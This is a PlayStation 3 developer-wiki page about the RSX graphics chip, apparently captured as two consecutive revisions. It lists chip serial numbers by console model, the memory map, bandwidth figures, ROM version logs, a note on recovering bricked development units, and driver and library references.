cache, the total RSX texture cache is 576kB. General RSX features include 2x and 4x hardware anti-aliasing, and support for Shader Model 3.0.<br /> <br /> == Serial Numbers @ SKU's ==<br /> &lt;gallery&gt;<br /> File:PS3 - RSX - 40nm 65nm 90nm - die sizes.jpg|[[RSX]] die sizes, left to right: 40nm 65nm 90nm<br /> &lt;/gallery&gt;<br /> <br /> The following is a small sample of serial numbers of the RSX by model number.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS3 Model !! Mobo Model !! Mobo serial !! RSX Serial !! Die Tech !! Die Size !! Remark<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971GB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-11 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-21 || [[CXD2971GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-31 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHDxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHExx]] || [[COK-00x#COK-002W|COK-002W]] || 1-873-513-xx || -? || 90nm || 258mm² || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHFxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971BGB]]&lt;br /&gt;&amp;nbsp;&amp;nbsp;or:&lt;br /&gt;[[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-31 || [[CXD2971-1GB]] || 90nm || 258mm² || -<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971-1GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHIxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHJxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-32 || [[CXD2982BGB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-42 || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHMxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHNxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHOxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHPxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHQxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991CGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991GGB]] || 65nm || ? 186mm² ? ||<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-21 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? ||<br /> |-<br /> | [[CECH-25xx]] || [[JSD-00x|JSD-001]] || 1-882-770-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-11 || [[CXD5301DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-31 || [[CXD5301A1GB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MSX-00x|MSX-001]] || 1-886-928-11 || [[CXD5302DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MPX-00x|MPX-001]] || 1-887-233-11 || [[CXD5302A1GB]] || 40nm || ? 114mm² ? || - [http://pocketnews.cocolog-nifty.com/pkns/2012/10/ps3-cech-4000-e.html pocketnews dissasembly]<br /> |-<br /> |}<br /> Other unspecified: [[CXD297BGB]] and [[CXD2971-1GB]] (CECHA&lt;!--//Pereb//--&gt; refurbished? note:lowest FW was 2.30)<br /> ===Alternative list===<br /> * [[CECHAxx]]/[[COK-00x#COK-001|COK-001]], [[CECHBxx]]/[[COK-00x#COK-001|COK-001]], [[CECHCxx]]/[[COK-00x#COK-002|COK-002]], [[CECHExx]]/[[COK-00x#COK-002W|COK-002W]] and [[CECHHxx]]/[[DIA-00x#DIA-001|DIA-001]] : [[CXD2971AGB]] (RSX 90nm)<br /> * [[CECHGxx]]/[[SEM-00x|SEM-001]] : [[CXD2971DGB]] (RSX 90nm)<br /> * [[CECHJxx]]/[[DIA-00x#DIA-002|DIA-002]] and [[CECHKxx]]/[[DIA-00x#DIA-002|DIA-002]] : [[CXD2982]] (RSX 65nm)<br /> * [[CECHLxx]]/[[VER-00x|VER-001]] up to including [[CECHQxx]]/[[VER-00x|VER-001]] : [[CXD2991BGB]] (RSX 65nm)<br /> * [[CECH-20xx]]/[[DYN-00x|DYN-001]] : [[CXD2991GGB]] (RSX 65nm)<br /> * [[CECH-21xx]]/[[SUR-00x|SUR-001]] : [[CXD5300AGB]] (RSX 40nm)<br /> * [[CECH-25xx]]/[[JTP-00x|JTP-001]] and [[CECH-25xx]]/[[JSD-00x|JSD-001]]: [[CXD5300A1GB]] (RSX 40nm)<br /> * [[CECH-30xx]]/[[KTE-00x|KTE-001]] : [[CXD5301DGB]] (RSX 40nm)<br /> &lt;br /&gt;<br /> <br /> == Local GDDR3 Memory Physical Structure==<br /> * Total Memory 256MB<br /> * 2 Partitions (128MB)<br /> * 64bit bus per partition<br /> * 8 Banks per partition (16MB)<br /> * 4096 Pages per bank (4KB) -&gt; 12bit Row Address<br /> * Memory block in a page -&gt; 9bit Column Address<br /> * Minimum access granularity = 8 bytes -&gt; same as buswidth between RSX &lt;&gt; GDDR<br /> <br /> =Software=<br /> <br /> == RSX Memorymap ==<br /> <br /> Although the RSX has 256MB of GDDR3 RAM, not all of it is useable. The last 4MB is reserved for keeping track of the RSX internal state and issued commands. The 4MB of GPU Data contains RAMIN, RAMHT, RAMFC, DMA Objects, Graphic Objects, and the Graphic Context. The following is a breakdown of the address within 256MB of the RSX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address Range !! Size !! Comment<br /> |-<br /> | 0000000-FBFFFFF || 252 MB || Framebuffer<br /> |-<br /> | FC00000-FFFFFFF || 4 MB || GPU Data<br /> |-<br /> | FF80000-FFFFFFF || 512KB || RAMIN: Instance Memory<br /> |-<br /> | FF90000-FF93FFF || 16KB || RAMHT: Hash Table<br /> |-<br /> | FFA0000-FFA0FFF || 4KB || RAMFC: FIFO Context<br /> |-<br /> | FFC0000-FFCFFFF || 64KB || DMA Objects<br /> |-<br /> | FFD0000-FFDFFFF || 64KB || Graphic Objects<br /> |-<br /> | FFE0000-FFFFFFF || 128KB || GRAPH: Graphic Context<br /> |-<br /> |}<br /> <br /> Besides local GDDR3 memory, main XDR memory can be accessed by RSX too, which is limited to either:<br /> * 0MB - 256MB (0x00000000 - 0x0FFFFFFF)<br /> ::-or-<br /> * 0MB - 512MB (0x00000000 - 0x1FFFFFFF)<br /> <br /> ==Speed, Bandwidth, and Latency==<br /> <br /> System bandwith (theoretical maximum):<br /> *Cell to/from 256MB XDR : 25.6 GB/s<br /> *Cell to RSX (IOIFO): 20GB/s (practical : 15.8GB/s @ packetsize 128B)<br /> *Cell from RSX (IOIFI) : 15GB/s (practical : 11.9GB/s @ packetsize 128B)<br /> *RSX to/from 256MB GDDR3 : 20.8GB/s (@ 650MHz)<br /> <br /> Because of the aforementioned layout of the communication path between the different chips, and the latency and bandwidth differences between the various components, there are different access speeds depending on the direction of the access in relation to the source and destination. The following is a chart showing the speed of reads and writes to the GDDR3 and XDR memory from the viewpoint of the Cell and RSX. Note that these are measured speeds (rather than calculated speeds) and they should be worse if RSX and GDDR3 access are involved because these figures were measured when the RSX was clocked at 550Mhz and the GDDR3 memory was clocked at 700Mhz. The shipped PS3 has the RSX clocked in at 500Mhz (front and back end, although the pixel shaders run separately inside at 550Mhz). In addition, the GDDR3 memory was also clocked lower at 650Mhz.<br /> <br /> === speed table ===<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Processor !! 256MB XDR !! 256MB GDDR3<br /> |-<br /> | Cell Read || 16.8GB/s || 16MB/s (15.6MB/s @ 650MHz)<br /> |-<br /> | Cell Write || 24.9GB/s || 4GB/s<br /> |-<br /> | RSX Read || 15.5GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> | RSX Write || 10.6GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> |}<br /> <br /> Because of the VERY slow Cell Read speed from the 256MB GDDR3 memory, it is more efficient for the Cell to work in XDR and then have the RSX pull data from XDR and write to GDDR3 for output to the HDMI display. This is why extra texture lookup instructions were included in the RSX to allow loading data from XDR memory (as opposed to the local GDDR3 memory).<br /> <br /> == ROM Versions ==<br /> <br /> These are the listed RSX ROM (aka Vbios) versions info we have collected from lv1 debug ouput<br /> <br /> DEH/DECR-1000:<br /> <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a01 420/600 vpe:ff shd:3f [AE0000915:0:1:16:b:f:1:1:1]<br /> <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a02 420/600 vpe:ff shd:3f [F9A458700:0:2:3:b:f:3:1:1][0:0:0:0:0:3]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/600 vpe:ff shd:77 [FCA684200:0:2:2:f:7:3:5:1][0:0:0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:7d [G1A778601:1:2:15:7:10:3:7:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b02 500/650 vpe:ff shd:3f [G2A874100:1:2:e:4:6:3:9:2][16:3:0:0:1:2:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:17:f:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:4:7:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E106900:1:2:c:b:6:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E107200:1:2:a:6:3:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E078500:1:2:11:c:f:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> DECR-1400: <br /> &lt;pre&gt;<br /> rsx: rsx65 a06 500/650 vpe:ff shd:6f [AP0013056:1:1:f:13:11:2:5:2][1c:0:2:0:1:2:0][2:1:0]<br /> &lt;/pre&gt;<br /> <br /> DECHA00A (January 2007): <br /> &lt;pre&gt;<br /> rsx: b08 500/650 vpe:ff shd:3f [AP0008286:1:1:14:e:b:2:11:1][39:2:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> DECH2000A (September 2009): <br /> &lt;pre&gt;<br /> rsx: rsx65 a06 500/650 vpe:ff shd:6f [AP0015079:1:1:b:14:14:2:5:2][1c:0:2:0:1:2:0][2:1:0]<br /> &lt;/pre&gt;<br /> <br /> RETAIL: <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: b08 1f4/28a vpe:ff shd:3f [AP0004687:1:1:14:13:a:2:f:1][16:3:1:1:1:3:1][0:0:0]<br /> <br /> CECH-2500<br /> rsx: rsx40 a01 500/650 vpe:ff shd:3f [NN3108-17:0:4:11:c:3:6:0:1][28:0:a:0:1:0:1][1:1:0]<br /> &lt;/pre&gt;<br /> <br /> Speculatively it is likely that the very first numbers are the actual rom version (a01, b01, b03, b07, b08...) despite Sony's documentation claiming otherwise, DECR-1000 units with rom version b07 and above (and perhaps some others that have not yet been encountered) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;. <br /> <br /> There is nothing in the documentation warning you about this and there is nothing preventing you (or a legitimate developer) to install an unsupported firmware as the vsh allows updating/downgrading to 1.00 or higher and the min praxis for those units is actually lower than 1.00. (0.08 to be exact)<br /> Should this issue occur to you, other than sending the unit back to Sony for servicing, the only way to fix this is to flash an ebootrom (as lv0 still runs fine and is in charge of handling flashing the system memory through lcnslsrv) the problem with that is that sony never released/issued an ebootrom for a firmware higher than 1.00.002 , so officially one would have no choice but to return the unit, that said, considering the ebootrom format is not rocket science and is actually documented (it's a very slight variation of the coreos package format, there are no specific checks whatsoever preventing you from crafting your own, it is not hashed, nor encrypted), you could (as we did) convert the PUP file of a higher firmware and flash it onto the unit to get a full recovery.<br /> <br /> == RSX Libraries ==<br /> The RSX is dedicated to 3D graphics, and developers are able to use different API libraries to access its features. The easiest way is to use high level PSGL, which is basicially OpenGL|ES with programmable pipeline added in - but hardly anyone uses PSGL these days, preferring to use the native GPU command buffer generation library, libgcm.<br /> At a lower level developers can use LibGCM, which is an API that talks to the RSX at a lower level. PSGL is actually implemented on top of LibGCM. For the advanced programmer, you can program the RSX by sending commands to it directly using C or assembly. This can be done by setting up commands (via FIFO Context) and DMA Objects and issuing them to the RSX via DMA calls.<br /> <br /> == Drivers (WiP/reference) ==<br /> <br /> * [http://mandos.homelinux.org/~glaurung/git/ps3rsx.git/ ps3rsx.git]<br /> * [http://mandos.homelinux.org/~glaurung/git/xf86-video-ps3.git/ xf86-video-ps3.git]<br /> * [http://nouveau.freedesktop.org/wiki/ nouveau wiki]<br /> * [http://psp.jim.sh/svn/listing.php?repname=ps3ware&amp;path=%2Ftrunk%2Flibps3rsx%2Fsrc%2Ffifo%2F&amp;#a408e4e3f64f03a0a91e8200a1a873401 libps3rsx]<br /> * [http://www.mesa3d.org/cell.html Mesa/Gallium Cell Driver]<br /> * git://nouveau.git.sourceforge.net/gitroot/nouveau/envytools (docs are in hwdocs, commands are in the xml's in rnndb)<br /> <br /> [[PSL1GHT]]<br /> * http://psl1ght.net/wiki/Homebrew_status<br /> * https://code.google.com/p/rsxgl/ / https://github.com/gzorin/RSXGL<br /> * https://github.com/kakaroto/e17<br /> <br /> = Other References =<br /> *&lt;strike&gt;http://7track.org/~durandal/ps3dox/&lt;/strike&gt; http://lol.notsoldierx.com/~durandal/ps3dox/ // http://173.220.0.157/~durandal/ps3dox/<br /> *http://wiki.ps2dev.org/ps3:rsx<br /> *[http://download.nvidia.com/developer/cg/Cg_1.4/1.4.1/Cg-1.4.1_UsersManual.pdf Cg Toolkit User's Manual: A Developer's Guide to Programmable Graphics, Release 1.4.1]<br /> *The Cg Tutorial (ISBN: 0321194969, Addison-Wesley, 2003)<br /> * [http://www.multiupload.com/D1XJHRH6Z9 cg-shader-tutorial.pdf (535.94 KB)] + [https://github.com/Themaister/Emulator-Shader-Pack Git: Emulator-Shader-Pack ]<br /> * http://pastie.org/private/qbpm88aml03vq8jexxvnsa PS3 RSX Glevand<br /> <br /> * Good overview of quotes of how SPU's are used together with RSX for retail games:<br /> **[http://www.neogaf.com/forum/showthread.php?p=7598043 PS3 games list &amp; SPE usages part 1]<br /> **[http://www.neogaf.com/forum/showpost.php?p=7598610&amp;postcount=32 PS3 games list &amp; SPE usages part 2]<br /> <br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=RSX&diff=46044 RSX 2017-09-02T16:48:57Z <p>Mathieulh: /* ROM Versions */ Added some more rom versions</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SCEI CXD2971DGB.JPG|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971DGB]]&lt;br /&gt;[[File:RSX 90nm without IHS.jpg|200px|thumb|left||RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971AGB without IHS]]&lt;br /&gt;[[File:RSX-GDDR-BGA-lifted.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;GDDR3 BGA lifted]]&lt;br /&gt;[[File:RSX-GPUcore-lifted.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;GPUcore BGA lifted]]&lt;br /&gt;[[File:RSX-BGA-lifted-missingpads.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;BGA lifted&lt;br /&gt;PCB underneath]]&lt;br /&gt;[[File:Nvidia-Die-G70.png|200px|thumb|left|Nvidia G70 die shot]]&lt;br/&gt;[[File:RSX die - Image made by Héctor Martín.jpg|200px|thumb|left|RSX die, scraped with razorblade by Héctor Martín]]&lt;br/&gt;[[File:BGA_crack1.jpg|200px|thumb|left|BGA Cracking (one of the reasons for YLOD error)]]&lt;/div&gt;<br /> <br /> = RSX - Reality Synthesizer =<br /> <br /> The RSX 'Reality Synthesizer' is a proprietary graphics processing unit (GPU) codeveloped by Nvidia and Sony for the PlayStation 3 game console. It is a GPU based on the Nvidia 7800GTX graphics processor and, according to Nvidia, is a G70/G71 (previously known as NV47) hybrid architecture with some modifications. The RSX has separate vertex and pixel shader pipelines. The GPU makes use of 256 MB GDDR3 RAM clocked at 650&lt;!--// NOT 700!!!//--&gt; MHz with an effective transmission rate of 1.4 GHz and up to 224 MB of the 3.2 GHz XDR main memory via the CPU (480 MB max).<br /> <br /> == Specifications ==<br /> * &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;500&lt;/abbr&gt;&amp;nbsp;MHz on 90 nm process (shrunk to 65 nm in 2008 and to 40 nm in 2010)<br /> * Based on NV47 Chip (Nvidia GeForce 7800 Architecture)<br /> ** early development tools had NV47 with 256 bit local memory interface and 16 ROPs<br /> ** later RSX with 128bit local memory interface and 8 ROPs<br /> * Little Endian<br /> ** 300+ million transistors<br /> ** Multi-way programmable parallel floating-point shader pipelines<br /> *** Independent pixel/vertex shader architecture<br /> *** 24 parallel pixel-shader ALU pipes clocked @ 550 MHz<br /> **** 5 ALU operations per pipeline, per cycle (2 vector&lt;sub&gt;4&lt;/sub&gt; , 2 scalar/dual/co-issue and fog ALU, 1 Texture ALU)<br /> **** 27 floating-point operations per pipeline, per cycle<br /> *** 8 parallel vertex pipelines<br /> **** 2 ALU operations per pipeline, per cycle (1 vector&lt;sub&gt;4&lt;/sub&gt; and 1 scalar, dual issue)<br /> **** 10 FLOPS per pipeline, per cycle<br /> *** Floating Point Operations: 400.4 Gigaflops ((24 * 27 Flops + 8 * 10 Flops) * 550)<br /> ** 24 texture filtering units (TF) and 8 vertex texture addressing units (TA)<br /> *** 24 filtered samples per clock<br /> **** Maximum Texel fillrate: 12.0 GigaTexels per second (24 textures * 500&amp;nbsp;MHz)<br /> *** 32 unfiltered texture samples per clock, ( 8 TA x 4 texture samples )<br /> ** 8 Render Output units / pixel rendering pipelines<br /> *** Peak pixel fillrate (theoretical): 4.0 Gigapixel per second<br /> *** Maximum Z-buffering sample rate: 8.0 GigaSamples per second (2 Z-samples * 8 ROPs * 500&amp;nbsp;MHz)<br /> ** Maximum Dot product operations: 51 billion per second (combined with Cell CPU)<br /> ** 128-bit pixel precision offers rendering of scenes with High dynamic range rendering<br /> ** 256 MB GDDR3 RAM at &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;650&amp;nbsp;MHz&lt;/abbr&gt;&lt;!--// NOT 700 !! //--&gt;<br /> *** Earlier PS3 Models: Samsung K4J52324QC-SC14 rated max 700MHz<br /> *** Later PS3 Models: Qimonda HYB18H512322AF-14 (seen on CXD2971DGB)<br /> *** 128-bit memory bus width<br /> *** 22.4 GB/s read and write bandwidth<br /> ** Cell FlexIO bus interface<br /> *** Rambus XDR Memory interface bus width: 56bit out of 64bit (serial)<br /> *** 20 GB/s read to the Cell and XDR memory<br /> *** 15 GB/s write to the Cell and XDR memory<br /> ** Support for PSGL (OpenGL ES 1.1 + Nvidia Cg)<br /> ** Support for S3 Texture Compression<br /> <br /> <br /> <br /> More features are revealed in the following chart delineating the differences between the RSX and the nVidia 7800 GTX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Difference !! RSX !! nVidia 7800GTX<br /> |-<br /> | GDDR3 Memory bus || 128bit || 256bit<br /> |-<br /> | ROPs || 8 || 16<br /> |-<br /> | Post Transform and Lighting Cache || 63 max vertices || 45 max vertices<br /> |-<br /> | Total Texture Cache Per Quad of Pixel Pipes (L1 and L2) || 96kB || 48kB<br /> |-<br /> | CPU interface || FlexIO || PCI-Express 16x<br /> |-<br /> | Technology || 40nm/65nm/90nm || 110nm<br /> |-<br /> |}<br /> <br /> Other RSX features/differences include:<br /> <br /> More shader instructions<br /> Extra texture lookup logic (helps RSX transport data from XDR)<br /> Fast vector normalize <br /> <br /> Note that the cache (Post Transform and Lighting Vertext Cache) is located between the vector shader and the triangle setup.<br /> <br /> A sample flow of data inside the RSX would see them first processed by 8 vertex shaders. The output are then sent to the 24 active pixel shaders, which can involve the 24 active texture units. Finally, the data is passed to the 8 Raster Operation Pipeline units (ROPs), and on out to the GDDR3. Note that the pixel shaders are grouped into groups of four (called Quads). There are 7 Quads, with 1 redundant, leaving 6 Quads active, which provides us with the 24 active pixel shaders listed above (6 times 4 equals 24). Since each Quad has 96kB of L1 and L2 cache, the total RSX texture cache is 576kB. General RSX features include 2x and 4x hardware anti-aliasing, and support for Shader Model 3.0.<br /> <br /> == Serial Numbers @ SKU's ==<br /> 